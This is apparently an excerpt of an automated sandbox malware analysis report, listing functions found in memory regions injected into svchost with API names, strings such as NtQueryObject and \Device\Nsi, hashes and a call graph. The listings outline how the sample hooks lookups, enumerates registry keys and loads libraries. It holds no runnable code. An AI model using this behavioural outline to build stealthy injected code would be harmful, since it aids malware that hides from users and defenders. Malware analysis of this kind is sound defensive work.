                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                        • String ID:
                                                        • API String ID: 2933794660-0
                                                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction ID: defa4ae0642d6a32399fd8954af5e6e6148f63eaf2e33393bd27ecb724b6d61b
                                                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction Fuzzy Hash: 31115A72715F428AEB00CF61E8953B933A4F319759F480E31DA6E867A4DB7CC1988380
                                                        Function 000001FB539C253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction ID: bb72addb5a8917fd1520e25578be5bde8718d817993148d3e88a25d5e77b9b06
                                                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction Fuzzy Hash: 7571A4B620978685EB25DF29D8C43FAA7A6F385784F4C0036DD8B53BA9DB3DC6458700
                                                        Function 000001FB53999E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797512847.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb53990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CallTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3163161869-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 3341bbce40f2fc636230826d8423e9b0d65deab6b2a0a9c3cd1c9539a72497e8
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: 7761927360AB468AEB10DF65D4907ED77A2F344B88F084225EF4A17BA8DB38D595CB00
                                                        Function 000001FB539C2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction ID: 1e2d7e75fcec33aae6cfda06d1fedda4746025f1c3ce262bf2523ed21a116398
                                                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction Fuzzy Hash: 305184B220E78B82EA64DA29E4D83FAE792F395740F4D0135DD9B03B6ADB3DC5058740
                                                        Function 000001FB539D26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction ID: ecc2ab4eee834b5eb349c99eeea2a38c23bc3884ca80047f2a69e4f6d83fdaf1
                                                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction Fuzzy Hash: FB41A8B271AA8185EB20DF25E4853F9B7A1F798794F584431EE8E877A4DB7CC441C740
                                                        Function 000001FB539C94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction ID: 0434695ab50d31999ccfb44931bc123f96a23a80cf5f0d546cb8bc6dfc13b013
                                                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction Fuzzy Hash: E6112B76219B8582EB618B15E4803A9B7E6FB88B94F5C4225EE8D07B69DF3CC551CB00
                                                        Function 000001FB53997356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797512847.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb53990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: ierarchy Descriptor'$riptor at (
                                                        • API String ID: 592178966-758928094
                                                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction ID: c69f2d03e7c10632b7f5d63e6c16b7762b360b625939375ae85a8f999810678c
                                                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction Fuzzy Hash: 2EE086B1749B4590DF028F21E8902E833A1DBA8B64F8C9232995D0A321FB3CD5E9C301
                                                        Function 000001FB539973B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797512847.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb53990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: Locator'$riptor at (
                                                        • API String ID: 592178966-4215709766
                                                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction ID: f00d30d7b76d42afc42083ec7512426173d9921f52db44da75f216fa2e63f94c
                                                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction Fuzzy Hash: 2EE086B1709B4590DF028F21E8901E87361E7A8B54F8C9232C94D0A321EB3CD5E5C300
                                                        Function 000001FB539C1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction ID: 6aa450c30a7baaebf75d86072b728c595605062254c08432bf4957f3f5be0a0b
                                                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction Fuzzy Hash: B6116375606B8A81FA04DB56D4852BA67A2F789FC0F5C4035DE4E43775DF3CC4418340
                                                        Function 000001FB539C1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction ID: 5be64a25ae3680dda377404a020bb3eed52e059bff3fe1fe1c5071d9c80fb988
                                                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction Fuzzy Hash: 18E0657560264586F7048F92D84939B3BE2FB89F45F48C424C94A07361DF7D8495C750

                                                        Execution Graph

                                                        Execution Coverage:0.7%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:66
                                                        Total number of Limit Nodes:2
                                                        execution_graph 14819 1cbd8ba273c 14821 1cbd8ba276a 14819->14821 14820 1cbd8ba2858 LoadLibraryA 14820->14821 14821->14820 14822 1cbd8ba28d4 14821->14822 14823 1cbd8bd1abc 14828 1cbd8bd1628 GetProcessHeap HeapAlloc 14823->14828 14825 1cbd8bd1acb 14826 1cbd8bd1ad2 Sleep SleepEx 14825->14826 14827 1cbd8bd1598 StrCmpIW StrCmpW 14825->14827 14826->14825 14827->14825 14872 1cbd8bd1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14828->14872 14830 1cbd8bd1650 14873 1cbd8bd1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14830->14873 14832 1cbd8bd1661 14874 1cbd8bd1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14832->14874 14834 1cbd8bd166a 14875 1cbd8bd1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14834->14875 14836 1cbd8bd1673 14837 1cbd8bd168e RegOpenKeyExW 14836->14837 14838 1cbd8bd18a6 14837->14838 14839 1cbd8bd16c0 RegOpenKeyExW 14837->14839 14838->14825 14840 1cbd8bd16e9 14839->14840 14841 1cbd8bd16ff RegOpenKeyExW 14839->14841 14876 1cbd8bd12bc RegQueryInfoKeyW 14840->14876 14843 1cbd8bd173a RegOpenKeyExW 14841->14843 14844 1cbd8bd1723 14841->14844 14846 1cbd8bd1775 RegOpenKeyExW 14843->14846 14847 1cbd8bd175e 14843->14847 14885 1cbd8bd104c RegQueryInfoKeyW 14844->14885 14851 1cbd8bd1799 14846->14851 14852 1cbd8bd17b0 RegOpenKeyExW 14846->14852 14850 1cbd8bd12bc 16 API calls 14847->14850 14853 1cbd8bd176b RegCloseKey 14850->14853 14854 1cbd8bd12bc 16 API calls 14851->14854 14855 1cbd8bd17d4 14852->14855 14856 1cbd8bd17eb RegOpenKeyExW 14852->14856 14853->14846 14857 1cbd8bd17a6 RegCloseKey 14854->14857 14858 1cbd8bd12bc 16 API calls 14855->14858 14859 1cbd8bd1826 RegOpenKeyExW 14856->14859 14860 1cbd8bd180f 14856->14860 14857->14852 14864 1cbd8bd17e1 RegCloseKey 14858->14864 14862 1cbd8bd184a 14859->14862 14863 1cbd8bd1861 RegOpenKeyExW 14859->14863 14861 1cbd8bd104c 6 API calls 14860->14861 14865 1cbd8bd181c RegCloseKey 14861->14865 14866 1cbd8bd104c 6 API calls 14862->14866 14867 1cbd8bd1885 14863->14867 14868 1cbd8bd189c RegCloseKey 14863->14868 14864->14856 14865->14859 14869 1cbd8bd1857 RegCloseKey 14866->14869 14870 1cbd8bd104c 6 API calls 14867->14870 14868->14838 14869->14863 14871 1cbd8bd1892 RegCloseKey 14870->14871 14871->14868 14872->14830 14873->14832 14874->14834 14875->14836 14877 1cbd8bd1327 GetProcessHeap HeapAlloc 14876->14877 14878 1cbd8bd148a RegCloseKey 14876->14878 14879 1cbd8bd1476 GetProcessHeap HeapFree 14877->14879 14880 1cbd8bd1352 RegEnumValueW 14877->14880 14878->14841 14879->14878 14881 1cbd8bd13a5 14880->14881 14881->14879 14881->14880 14883 1cbd8bd13d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14881->14883 14884 1cbd8bd141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 14881->14884 14890 1cbd8bd152c 14881->14890 14883->14884 14884->14881 14886 1cbd8bd11b5 RegCloseKey 14885->14886 14887 1cbd8bd10bf 14885->14887 14886->14843 14887->14886 14888 1cbd8bd10cf RegEnumValueW 14887->14888 14889 1cbd8bd114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14887->14889 14888->14887 14889->14887 14893 1cbd8bd1546 14890->14893 14894 1cbd8bd157c 14890->14894 14891 1cbd8bd1565 StrCmpW 14891->14893 14892 1cbd8bd155d StrCmpIW 14892->14893 14893->14891 14893->14892 14893->14894 14894->14881

                                                        Executed Functions

                                                        Function 000001CBD8BD1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction ID: 3351c60c845fd7169fdfdb9f14dc5b268d6217c379f2eec7515d69f6ca4aac72
                                                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction Fuzzy Hash: 82E039356417048AFB068BE2D8497AA36E1EB9AB1AF049028890A47351DF7EC499C791
                                                        Function 000001CBD8BD328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction ID: 0989cddc6aaa1a1faba2074b06e92315ed3e7b45a9aad1d7a4383a5ef0838ee0
                                                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction Fuzzy Hash: 71115A366DC700A6F76097E0AAC7FF92296A748B1FF404128990FC1592FF7BC044C280
                                                        Function 000001CBD8BD1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 000001CBD8BD1628: GetProcessHeap.KERNEL32 ref: 000001CBD8BD1633
                                                          • Part of subcall function 000001CBD8BD1628: HeapAlloc.KERNEL32 ref: 000001CBD8BD1642
                                                          • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD16B2
                                                          • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD16DF
                                                          • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD16F9
                                                          • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD1719
                                                          • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD1734
                                                          • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD1754
                                                          • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD176F
                                                          • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD178F
                                                          • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD17AA
                                                          • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD17CA
                                                        • Sleep.KERNEL32 ref: 000001CBD8BD1AD7
                                                        • SleepEx.KERNELBASE ref: 000001CBD8BD1ADD
                                                          • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD17E5
                                                          • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD1805
                                                          • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD1820
                                                          • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD1840
                                                          • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD185B
                                                          • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD187B
                                                          • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD1896
                                                          • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD18A0
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$HeapSleep$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1534210851-0
                                                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction ID: b0c894f7784fe93fd5e4d912c2eb019049ba366880ae2a28af5649d789d49e3d
                                                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction Fuzzy Hash: 94312571389B0161FB509BE2D6D37F9939AA744BCAF0464218E0FC7296FF17C451C290
                                                        Function 000001CBD8BD3844 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 58 1cbd8bd3844-1cbd8bd384f 59 1cbd8bd3869-1cbd8bd3870 58->59 60 1cbd8bd3851-1cbd8bd3864 StrCmpNIW 58->60 60->59 61 1cbd8bd3866 60->61 61->59
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: dialer
                                                        • API String ID: 0-3528709123
                                                        • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                        • Instruction ID: 6c3c39336d40b37e6c8cf9515fa28cbcf7c24992cf0487896dc8f09ec8df4234
                                                        • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                        • Instruction Fuzzy Hash: 7CD05E703953059AFB159FEA88C6EF02351AB08B9AF888024890A81251EB5BC99DD750
                                                        Function 000001CBD8BA273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797368279.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8ba0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction ID: 18b38bb5507917fa2352624df611951c3bb57cdfa5d1b2d23385e643455212a1
                                                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction Fuzzy Hash: E4614732B8539087EB14CF948081BBD739AFB54B99F548131DE0E53785DB7AD852C784

                                                        Non-executed Functions

                                                        Function 000001CBD8BD2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 356 1cbd8bd2b2c-1cbd8bd2ba5 call 1cbd8bf2ce0 359 1cbd8bd2ee0-1cbd8bd2f03 356->359 360 1cbd8bd2bab-1cbd8bd2bb1 356->360 360->359 361 1cbd8bd2bb7-1cbd8bd2bba 360->361 361->359 362 1cbd8bd2bc0-1cbd8bd2bc3 361->362 362->359 363 1cbd8bd2bc9-1cbd8bd2bd9 GetModuleHandleA 362->363 364 1cbd8bd2bdb-1cbd8bd2beb GetProcAddress 363->364 365 1cbd8bd2bed 363->365 366 1cbd8bd2bf0-1cbd8bd2c0e 364->366 365->366 366->359 368 1cbd8bd2c14-1cbd8bd2c33 StrCmpNIW 366->368 368->359 369 1cbd8bd2c39-1cbd8bd2c3d 368->369 369->359 370 1cbd8bd2c43-1cbd8bd2c4d 369->370 370->359 371 1cbd8bd2c53-1cbd8bd2c5a 370->371 371->359 372 1cbd8bd2c60-1cbd8bd2c73 371->372 373 1cbd8bd2c83 372->373 374 1cbd8bd2c75-1cbd8bd2c81 372->374 375 1cbd8bd2c86-1cbd8bd2c8a 373->375 374->375 376 1cbd8bd2c9a 375->376 377 1cbd8bd2c8c-1cbd8bd2c98 375->377 378 1cbd8bd2c9d-1cbd8bd2ca7 376->378 377->378 379 1cbd8bd2d9d-1cbd8bd2da1 378->379 380 1cbd8bd2cad-1cbd8bd2cb0 378->380 381 1cbd8bd2da7-1cbd8bd2daa 379->381 382 1cbd8bd2ed2-1cbd8bd2eda 379->382 383 1cbd8bd2cc2-1cbd8bd2ccc 380->383 384 1cbd8bd2cb2-1cbd8bd2cbf call 1cbd8bd199c 380->384 385 1cbd8bd2dac-1cbd8bd2db8 call 1cbd8bd199c 381->385 386 1cbd8bd2dbb-1cbd8bd2dc5 381->386 382->359 382->372 388 1cbd8bd2d00-1cbd8bd2d0a 383->388 389 1cbd8bd2cce-1cbd8bd2cdb 383->389 384->383 385->386 393 1cbd8bd2dc7-1cbd8bd2dd4 386->393 394 1cbd8bd2df5-1cbd8bd2df8 386->394 390 1cbd8bd2d3a-1cbd8bd2d3d 388->390 391 1cbd8bd2d0c-1cbd8bd2d19 388->391 389->388 396 1cbd8bd2cdd-1cbd8bd2cea 389->396 398 1cbd8bd2d3f-1cbd8bd2d49 call 1cbd8bd1bbc 390->398 399 1cbd8bd2d4b-1cbd8bd2d58 lstrlenW 390->399 391->390 397 1cbd8bd2d1b-1cbd8bd2d28 391->397 393->394 401 1cbd8bd2dd6-1cbd8bd2de3 393->401 402 1cbd8bd2dfa-1cbd8bd2e03 call 1cbd8bd1bbc 394->402 403 1cbd8bd2e05-1cbd8bd2e12 lstrlenW 394->403 404 1cbd8bd2ced-1cbd8bd2cf3 396->404 407 1cbd8bd2d2b-1cbd8bd2d31 397->407 398->399 414 1cbd8bd2d93-1cbd8bd2d98 398->414 409 1cbd8bd2d5a-1cbd8bd2d64 399->409 410 1cbd8bd2d7b-1cbd8bd2d8d call 1cbd8bd3844 399->410 411 1cbd8bd2de6-1cbd8bd2dec 401->411 402->403 421 1cbd8bd2e4a-1cbd8bd2e55 402->421 405 1cbd8bd2e14-1cbd8bd2e1e 403->405 406 1cbd8bd2e35-1cbd8bd2e3f call 1cbd8bd3844 403->406 413 1cbd8bd2cf9-1cbd8bd2cfe 404->413 404->414 405->406 415 1cbd8bd2e20-1cbd8bd2e33 call 1cbd8bd152c 405->415 416 1cbd8bd2e42-1cbd8bd2e44 406->416 407->414 417 1cbd8bd2d33-1cbd8bd2d38 407->417 409->410 420 1cbd8bd2d66-1cbd8bd2d79 call 1cbd8bd152c 409->420 410->414 410->416 411->421 422 1cbd8bd2dee-1cbd8bd2df3 411->422 413->388 413->404 414->416 415->406 415->421 416->382 416->421 417->390 417->407 420->410 420->414 427 1cbd8bd2e57-1cbd8bd2e5b 421->427 428 1cbd8bd2ecc-1cbd8bd2ed0 421->428 422->394 422->411 432 1cbd8bd2e63-1cbd8bd2e7d call 1cbd8bd85c0 427->432 433 1cbd8bd2e5d-1cbd8bd2e61 427->433 428->382 435 1cbd8bd2e80-1cbd8bd2e83 432->435 433->432 433->435 438 1cbd8bd2ea6-1cbd8bd2ea9 435->438 439 1cbd8bd2e85-1cbd8bd2ea3 call 1cbd8bd85c0 435->439 438->428 441 1cbd8bd2eab-1cbd8bd2ec9 call 1cbd8bd85c0 438->441 439->438 441->428
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 2119608203-3850299575
                                                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction ID: 79a09f8f3720bc5273b010d1f356e68a70ec6752ccfd98b3c301455b28cdac55
                                                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction Fuzzy Hash: 4BB16B32258B9096FB698FE5D482BF963AAF744B8AF045016DE0F93794DB37D841C380
                                                        Function 000001CBD8BD7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction ID: 03cf5bd3c19122581734986f2c10f6d311e666521bfd68b1f6af84beb660f4f4
                                                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction Fuzzy Hash: F6319E72248B809AFB608FE0E881BED7365F785709F44402ADA4F87B94EF3AC549C740
                                                        Function 000001CBD8BDD2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
